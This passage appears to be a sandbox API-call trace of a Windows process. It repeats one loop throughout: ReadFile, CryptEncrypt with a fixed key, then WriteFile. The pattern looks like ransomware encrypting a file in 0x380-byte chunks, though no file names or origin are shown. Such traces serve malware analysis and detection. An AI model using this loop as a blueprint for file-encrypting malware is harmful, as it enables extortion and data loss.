hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.985] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.985] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.985] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.985] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.985] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.985] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.985] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.985] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.985] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.986] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.986] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.986] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.986] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.986] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.986] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.986] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.986] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.986] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.986] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.986] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.986] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.986] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.986] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.986] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.987] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.987] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.987] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.987] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.987] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.987] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.987] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.987] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.987] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.987] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.987] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.987] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.987] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.987] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.988] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.988] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.988] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.988] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.988] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.988] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.988] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.988] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.988] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.988] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.988] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.988] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.988] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.988] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.988] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.989] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.989] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.989] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.989] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.989] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.989] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.989] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.989] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.989] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.989] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.989] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.989] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.989] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.989] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.989] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.990] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.990] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.990] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.990] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.990] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.990] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.990] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.990] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.990] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.990] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.990] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.990] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.991] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.991] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.991] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.991] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.991] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.991] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.991] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.991] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.991] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.991] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.991] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.991] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.991] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.991] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.991] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.992] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.992] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, 